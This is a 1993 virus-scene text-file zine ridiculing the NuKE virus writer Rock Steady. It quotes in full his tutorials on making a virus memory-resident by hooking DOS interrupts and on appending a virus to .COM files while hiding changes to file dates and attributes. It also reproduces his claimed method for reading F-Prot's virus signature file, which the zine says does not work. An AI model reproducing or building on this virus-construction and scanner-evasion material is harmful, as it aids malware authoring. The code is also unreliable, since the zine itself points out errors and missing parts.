2 Much Thinking Issue 0
[07.14.93] _______
/ ___ \
|_| \ |
| |
/ /
/ /
/ /_____
|_________| Much Thinking Issue #0
The File Writer Presents...
-* Will Rock Steady ever know what he is talking about? *-
_______________________________________________________________________
/ Disclaimer: \
| If we happen to mention you in this text and you happen to find |
| it offensive well please, don't CRY! We don't give a damn if you find |
| it offensive. This is just our thoughts put into a text file and |
| released to the public. All of it is the truth and only people that |
| are hiding something will find it offensive. Enjoy... |
\_______________________________________________________________________/
2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT
2MT is just a collection of thoughts about things that are on peoples minds today. Some may be funny some may be offensive. Anyhow most of our points will be supported by facts. A new issue will be released everytime a new topic comes up.
If you would like to respond please just create a text file with the same name but an 'R' in the extention. For example if you would like to respond to this issue name the file '2MT-0.TXR'. Then distribute it and it will eventually get to one of the authors. Please only those who are directly effected by the topic need to respond. We don't want 50 text running around with the same name. Enjoy...
- 2MT President -
P.S. We frankly don't care about the spelling. At least you will know what we are talking about. If you have a problem with the grammer then PHUCK OFF!
2MT-2MT-2MT-2MT-2MT
Will Rocko ever know what he is talking about? I doubt it. Judging from what he has tried to talk about in the past and today it all sounds like garbage. To put it simple... He just doesn't have any clue what he is doing. I don't know why he is in the virus world. The "fame" of nuke has nothing to do with him. He just spread the name with his big mouth. All the work done by him is garbage.
Rocko always claimed that his code was 100% working but it never did. Well maybe a couple of times but most of the time it just made no sense. We will first back up these accusations with a couple articles written by him in the past NK-Info's and then continue.
First there was Nk-Info2. The great Rock tried to take it upon himself to teach everyone how to write memory resident viruses. Well the code he gave was garbage and is never used by viruses. A clear example that he had no idea what he was talking about. Read the article for yourself.
Contruction Kit for TSR Virii
Rock Steady
There are several ways to constructed your viruses. Mainly you have those which are RAM-Resident or better known as a TSR program. And with great thought we have those which are not RAM-Resident.
A TSR virus will load into memory and can infect all programs that are executed by the computer. Such like my AmiLiA virus which will infect all EXE and COM files that are ran. Anyhow a TSR virus can certainly spread a lot faster compared to a Non-Resident Virus. Because a NON-Resident Virus will only infect file each time it is ran. Though the NON-Resident will start off very slowly infecting the system files but after the virus is in the system after a number of weeks, it will certainly infect ALL files that are in the system. Where a TSR virus will USUALLY infect files that are executed. So that only files that are often executed will be infected. But The TSR virus can certainly infect A LOT more files than a Non-Resident JUST on the first Hour! It is out numbered 10 to 1. This is the advantage that all programmers enjoy and program TSR viruses. I will explain a SIMPLE method of making your program a TSR one. And it will be as flexible as you want so that NO ONE can stay you `Stole' this information off Rock Steady.
Anyhow I will explain the simple Process of Intercepting ROM-Bios Interrupts and hooking your virus/Program to any Interrupt of your choice. This method that is being explained is also used ALL the Jerusalem Strains. And several of the Vacsina Strains. They total up to close to 100+ Viruses that use this simple way with the TSR Interrupt 27h. Anyhow just because I'm explaining this method your virus CANNOT be detected because of this TSR routines because there are routines I DEVELOPED ALONE and will soon to be release in one of my future virii. Anyhow there are an UNLIMITED amount of ways to make TSRs so that along as you Develop YOUR OWN routine it will NEVER get detected as a virus for all you Beginners. And how this routine can be used in several OTHER utilities not just viruses.
Beginning...
First we must Intercept an Interrupt, Lets say we want our virus to activate Every TIME the disk I/O is being used we would use INT 13h or INT 21h. The INT 13h will activate everytime ANY file is opened or Closed And the INT 21h will activity anytime any file is executed or any INT 21h functions Like a "DIR" in DOS. If you want you can even hooked your virus to INT 10h and it may activate when Graphics are displayed, or you can hook it to the interrupt involved with Printer Functions. Whatever seems to `EnLighten' you, since we live in a Distressed world, I won't even bother why we shouldn't hooked them up to just ANY interrupt.
Anyhow, interrupts use a vector table at the bottom of memory (ROM) to find out what routine in the ROM Bios to call. So the address for Interrupt 21h would be located at 0000:0084 and for Interrupt 13h it would be found at 0000:004Ch. So we can change theses addresses in the vector table. What we do is we change the vector address to POINT to our virus. So everytime the Interrupt is called it goes to the vector table and the table tells it to call our Virus, rather than calling the ROM Bios. But what MUST do FIRST is save the ORIGINAL Interrupt routine and place that somewhere in memory. So that our virus will call the Original ROM Bios routine after executing itself.
Lets say we hooked our Virus to the INT 13h, which controls all Disk Activities. So if our Computer users tries to read something from the disk the Computer will call the INT 13h bios Routines on How To do it. But instead of finding the INT 13h routines it calls our virus, and the Virus gets ran, which then our virus does what it has to do, and then runs the Original INT 13h Routine where-ever it was stored. So it simulates an INT call to the ROM bios routines.
;----------------------------------------------------------------
; Sample Program on how to Hook your virus to an Interrupt call.
;----------------------------------------------------------------
Code Segment
Assume cs:code,ss:code,ds:code,es:code
Org 100h ; Guess this will be a COM file? Huh?
Begin: JMP Bios_Routine
NOP ; This is just a cheap .COM file that the
NOP ; virus is attached to. Remember you should
NOP ; have the first 3 bytes written in your
INT 20h ; virus.
OLD_ROM_INT DD ? ;Our Stack to save the OLD Int Address
;----------------------------------------------------------------
; This Calls the VIRUS and then the simulates the OLD Rom Routine
;----------------------------------------------------------------
Virus_Codes PROC FAR
Assume cs:code, ds:nothing
pushf ; Everytime the ROM-Routine is call this
push ax ; is what happens... Saves the Regesters
push di ; And runs Our Virus... Then it restores
push si ; the regesters and Runs the OLD_ROM Bios
push es ; Routine that was supposed to be ran in
push ds ; the first place...
call The_Virus
pop ds ;NoTe: It's better to SAVE all Regesters and
pop es ; Flags because our Virus WILL ALTER a few
pop si ; And when the Virus leaves control back to the
pop di ; Computer it is EXPECTED to continue where it
pop ax ; It left off...
popf
pushf ; This `pushf' is NEEDED to act like a simulated
call OLD_ROM_INT ; ROM Bios Interrupt call...
ret
Virus_Codes ENDP
;----------------------------------------------------------------
; Put the REAL Virus Codes here...
;----------------------------------------------------------------
The_Virus PROC NEAR
... ; Put your OWN Virus codes here...
... ; Just make it compatible with our
... ; Codes... Try to make it small and
... ; it will take up less space in the
... ; users' memory.
...
... ;NoTe: Try to infect files that are ONLY
... ; Executed! Rather than each time the INT
... ; is used... Get it?
RET
The_Virus ENDP
;---------------------------------------------------------------
; This is the Procedure that SAVE the OLD_ROM Bios in our Virus
; And places a Call to point to our Virus. Which then Calls the
; OLD_ROM Bios Routine. So Remember to SAVE it first.
;---------------------------------------------------------------
Bios_Routine PROC NEAR
Assume cs:code,ds:code
mov ah,35h ; This Asks for the interrupt vector!
mov al,13h ; whatever is in AL is what int vector
int 21h ; address you get and is stored in ES:BX
mov word ptr OLD_ROM_INT,bx ;Save the BX register in our Stack
mov word ptr OLD_ROM_INT[2],es ;And same to the ES Register
; Here you SHOULD put a small routine to check if the Interrupt vector has
; already been changed! For INT 13h this should contain 0000:004Ch the
; formula for this is (Interrupt # times 4) For INT 21h it is (21h x 4)=84h
; and so on. So if its been changed it means the virus has already changed
; it! And it `Should' be resident. How ever this is a simple way of doing
; it. but not always the BEST way... Because any program the hooks to the
; virus interrupt will fool the virus to think it is already resident.
; Though this source is NOT for the Professional Virus Programmer like myself
; because WE KNOW! But for those that are half way there...
mov ah,25h ; This asks to set a Interrupt vector address!
mov al,13h ; Interrupt # to be set goes in AL
mov dx,offset Virus_Codes ; Sets INT 13h to point to `Virus Code'
int 21h
mov dx,offset Bios_Routine
int 27h
Bios_Routine ENDP
; Anything after this point will not be memory resident. because the end
; of the resident portion ends at `Bios_Routine' procedure.
Code ENDS
END Begin
;----------------------------- EnD ----------------------------------
Simple isn't it? Anyhow I tried to make this as simple as possible. I hope I didn't lose you. Anyhow this is a simple routine that several TSR virii use. Anyhow, see what that gives you....
Rock Steady NukE / Viral Development Researcher
-PeAcE-
Haha.. thats always worth a good laugh. It just doesn't make sense. But to him this was a major break through.
The next article he tries to teach all how to infect .COM files.
He forgets one major thing. The delta offset. You need one of those.
Well read it and try to write one with the information presented.
Construction Kit on infecting .COM
Rock Steady
Well I must state my opinion that there are certainly WAY too many Overwriting Viruses out here. To help put a Stop to this I will try to explain to you a SIMPLE way to infect COM files at the END of the Program. This routine WORKS if you follow my steps correctly, and I've already used this in my `ParaSite ][' Virus.
Anyhow this is a brief description what the ASM Source will do.
- Find a .COM file in the current Directory
- Save the Date and File's Attribute.
- Save the First 3 Bytes in a Stack
- Infect the File & restore new 3 bytes..
- Put the OLD date and File Attributes back on
Beginning...
;----------------------------------------------------------------------
; The Simple routine to Search for a .COM File...
;----------------------------------------------------------------------
com_files db "*.com",0
mov ah,4eh ;point to a *.COM file...
mov dx,com_files
mov cx,3 ;Attributes with ReadOnly or Hidden
int 21h ;is A okay...
cmp ax,12h ;Any files found?
je exit ;If no Files found Exit...
jmp found_file
; Instead of Exiting here you can make the Virus go and change dir and
; look for several other .com files else where... with the help of the
; path or simply searching for more <dir>...
found_file:
mov di,[si+file] ;di points to the filename
push si
add si,file ;si points to filename...
mov ax,offset 4300h ;get file Attributes...
mov dx,si ;filename in dx..
int 21h
mov file_attrib,cx ;Save file Attributes.
file dw 0
; Here we'll set the file attributes to nothing
mov ax,offset 4301h ;To set file Attributes...
mov cx,offset 0fffeh ;Set them to a Normal File
mov dx,si ;filename...
int 21h
mov ax,offset 3d02h ;Open File to Read/Write.
mov dx,si ;ASCIIZ filename
int 21h
jnb ok ;If file was open continue
jmp put_old_attrib ; error happened restore old attribs
; and quit.
ok:
mov bx,ax
mov ax,offset 5700h ;Get File Date & Time...
int 21h
mov old_time,cx ;Save old File Time...
mov old_date,dx ;Save old File Date
old_time db 0
old_date db 0
; here we infect the file... but first we SAVE the first 3 bytes
; somewhere in our virus
mov ah,3fh ;Read file...
mov cx,3 ;Number of bytes to read
mov dx,first_3 ;Save bytes in the buffer
add dx,si ;Filename...
int 21h
cmp ax,3 ;Where 3 bytes read?
jnz fix_file ;If not fix file like before and quit
first_3 equ $ ; The First three bytes of the Original File!
int 20h ; the virus is infected to.
nop
; This moves the File pointer to the END of the file
mov ax,offset 4202h
mov cx,0
mov dx,0
int 21h
mov cx,ax ;DX:AX is the FILESIZE!
sub ax,3 ;subtract three because of file pointer
add cx,offset c_len_y
mov di,si
sub di,offset c_len_x
mov [di],cx ;Modifies the 2nd & 3rd bytes of program
; The writes our virus to the file
mov ah,40h
mov cx,virlength ;Virus Length
mov dx,si ;File...
sub dx,offset codelength ;Length of virus codes.
int 21h
cmp ax,offset virlength ;all bytes written?
jnz fix_file ;If no fix file and quit
;Moves the file pointer to the beginning of file and write the
;3 bytes JMP at the beginning of the file
mov ax,offset 4200h
mov cx,0
mov dx,0
int 21h
mov ah,40h ;Write to file...
mov cx,3 ;# of bytes to write...
mov dx,si ;File name...
add dx,jump ;Point to the new JMP statement
int 21h
jump db 0e9h ;This is the JMP that will be put in the
;Begining of the file!
;Restore Old File Time & Date
fix_file:
mov dx,old_date ;Old File Date
mov cx,old_time ;Old file Time...
and cx,offset 0ffe0h ;Flat Attribs.
mov ax,offset 5701h
int 21h
mov ah,3eh
int 21h ;Close file...
; Here we'll restore the old file attributes...
put_old_attrib:
mov ax,offset 4301h
mov cx,old_att ;old File Attributes.
mov dx,si ;Filename...
int 21h
;----------------------------- EnD -------------------------------------
Anyhow that's it... Simple no? This source was also used in my ParaSite ][ Virus that is STILL undetectable to date with Scanv85. Anyhow I even made it MORE simpler than my real sources that have to play with the file paths.
Anyhow theres still work to be done, like you must restore the old data file so it will jump to 100h and run the old file the virus was infected too! Remember to store them in the beginning and then restore them! Anyhow there's a few Variables to be put in like `VirLength' which you should know how to do that also the `CodeLength' that is the VIRUS codes ONLY not counting the Stacks.
Anyhow This works FINE with a Non-Resident Virus. Because a few statements would have to be edited for TSRs. Anyhow try to use this, it's small neat and fast.
Anyhow Perhaps next issue I will develop a SIMPLE Ram-Resident virus that infects COMs and EXEs to be released into the next issue! Though I just release this sources for you to LEARN! Rather than putting you name on my virus and releasing another strain on work I worked Hard upon! Anyhow I should release a SIMPLE new Virus source for all you programmers out there! And I will even explain a few Stealth Technics like how to hide your program in memory right under the TOM.
If there's Any Questions you want to know, please ask them I will answer them in the next [NukE] Releases... I may even release source codes on how to make an Algorithm Encryption method! I've developed one on my own, without the V2PX viruses sources... Anyhow it does the job and the formula I developed has an UNLIMITED amount of encryption methods! But since the virus codes have to be SMALL Like close to 2,000 bytes I will limit the formula to about 1,000 different combinations!
Rock Steady NukE / Viral Development Reaseacher
-PeAcE-
mov ax,offset 4301h ;To set file Attributes...
mov cx,offset 0fffeh ;Set them to a Normal File
^^^^^^
He didn't even know how to program in assembly talk about infect .COM files. Pure Jokes. Anyways read the last couple of paragraphs. They are worth a couple of laughs. As if anything he states in them was true. Where are they today?
I was going to use another exampel from NK-INFO3 where he state they made a varient of Ping-Pong that works on 286+ but I can't bother. Here's a more moder example. Taken from a messege directly from Nukes own net. It talk's about how the scan strings are stored in F-Prot. We tried this and it didn't work so I have no idea of what he was talking about. Maybe he can go into greater detail. All comments are enclosed with { }.
Yeah, I believe we already posted how it was done in Scan, as I remember scan adds 90h to its strings, and when it compares the code, it adds 90h to the code so it matches the strings... etc... {Never tried this.}
Fprot I posted a while back... the Sign.def, is arrange in two main parts... First we have all the Signature Strings, and then we have the all the names at the bottom...
Eg: 08 EA 49 40 20 48 94 20 49 08-03
| | |
| | If you JUMP this distance from this location
| | you will find the beginning of the virus name
| | for this string @
| This is the FIRST byte of the virus string! F-Prot
| writes the virus strings BACKWARDS, that way it
| doesn't interfer with other virus scanners that
| detect the same string.
This is the length of the virus scan string! When F-prot reads this it
jumps 08h bytes front, and falls on (49h) which is the first byte of the virus
scan string, and subtracts -1 each time...
If a match is found, you goto the address of the last two Bytes, and print the virus name that is there... @
@ The two points marked with this contradict themself. Read them again and you will see.
Now to test out his method we pull out the old F-Prot 208a and get the sign.def file. To test his theory the first so called string is...
04 DE 00 00 40 16-00
| | |
| | when we jump this far from this location we got
| | garbage
| |
| This should be the start of the string
The string is 4 bytes long.
This was the first bytes in the sign.def file and they made no sense at all. Maybe we'll wait till he releases the source to his program that gets the strings. If there is one.
Thats enough on poor Rocko. In his defence I would like to say that he has changed his ways a bit. And has shown that he does know a little about what he is talking about. Thats better than before. I just don't want to see him making fun of any new virus groups that come out saying their overwriter's are the best. Because he was just as lame, actually lamer when he started. Atleast new groups don't talk about bullshi....
The File Writer
___________________________________________________
/ _______ \
|/ ___ \ |
||_| \ | |
| | | |
| / / End Of File! |
| / / |
| / /_____ |
||_________| Much Thinking...(C) 1993 |
\___________________________________________________/